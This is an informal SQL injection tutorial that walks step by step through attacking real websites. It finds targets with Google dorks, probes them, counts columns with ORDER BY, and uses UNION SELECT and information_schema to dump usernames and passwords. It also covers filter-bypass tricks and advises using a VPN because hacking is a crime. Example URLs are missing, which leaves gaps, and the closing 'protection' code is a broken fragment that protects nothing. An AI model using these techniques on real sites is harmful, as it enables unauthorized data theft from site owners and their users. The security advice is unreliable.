1) SQL Injection?
SQL Injection is type of web attack. Attacker use hole in script to take all data from database. Vulnerable sites are in format:
You can put anything else instead of index.
2) Finding vulnerable sites:
Best way to find vulnerable site is by using Google. We use these dorks to find sites but if you have your own may than go ahead :
3) Site vulnerability check:
There are 2 ways to check if site is vulnerable so here are the ways.
1st way, we got link:
we are gonna add only ‘ at end of link so we get this link:
2nd way, we got link:
we are going to add +and+1=2– at end of link so we get:
If some part of page disappear (picture, text or something) or any error like (You have an error in your SQL syntax) site is vulnerable.
4) Finding number of columns
We can do it by using function order by, on link :
If page is opens normal there is more then 5 columns. Lets try with 10.
Now some part of site disappeared, which means that there’s more then 5 and less then 10 columns. Lets try 7.
Page is opened normally which means that there is more then 7 and less then 10 columns. Lets try 8.
on column 8 part of site disappear which means that there is 7 columns.
5) Finding vulnerable columns
Finding vulnerable columns is done with function union select all on link (in this case) we are going to add+union+select+all+1,2,3,4,5,6,7–
It is going to write numbers on page (in this case 1 2 3 4 5 6 7) which means that data can be taken from any column. We are going to take from second column.
6) Finding database version
As I said we are gonna take data from second column. Instead of number 2 we are going to put version() or @@version
on page where number 2 was, it will show database version.
If database version is 4 we have to guess name of table and column, but if database version is 5 we have to guess database version.
We have version 5.0.51a-24+lenny5 which means that we don’t have to guess name of table and column.
7) Finding table names
If database version is 4 you wont be able to find name of table and column, you have to guess their names. If database version is skip this step.
Names of some possible tables:
Names of some possible columns:
If database version is 5 we can take name of table by doing next step: instead of number 2 we going to putgroup_concat(table_name) and after number of last column+from+information_schema.tables+where+table_schema=database()–
So we get this link:
Instead of number 2 it showed name of table, in this case date, book, users. We gonna take columns from users table.
8) Finding column name
We found table name that we want and now from that we want to take columns. Instead ofgroup_concat(table_name) we are going to put group_concat(column_name) and instead of+from+information_schema.tables+where+table_schema=database()– we are going to put+from+information_schema.columns+where+table_name=hex– instead of hex we have to encrypt in hex name of table.
write the name of thetable (in this case users) and we get hex-ed number: 7573657273 so now can see the columns:
9) Taking data from columns
We got: id, name, surname, username, password, level.
We need only username and password.
Instead of group_concat(column_name) we put group_concat(username,0x3a,password) 0x3a stands for to make space between user and pw. Instead of from+information_schema.columns+where+table_name=0x7573657273– we put +from+users–
and we have link:
and result e.g.:
which is users and passwords from this site.
10) Filter bypassing
In case when you write union+select+all says “not accessible” then change it to UnIoN+sElEcT+aLl
On some sites space is restricted so you can put + or /**/ (/* start of comment in php and finish */)
On some sites there is also restricted database version so you can use unhex(hex(version()))
11) Site protection from SQL Injection
Just put this code in your script:
echo 'It is gonna write text when some try to add /' or and+1=2';}
Hope you enjoy
So to be safe use always a vpn when you hack a website because is a crime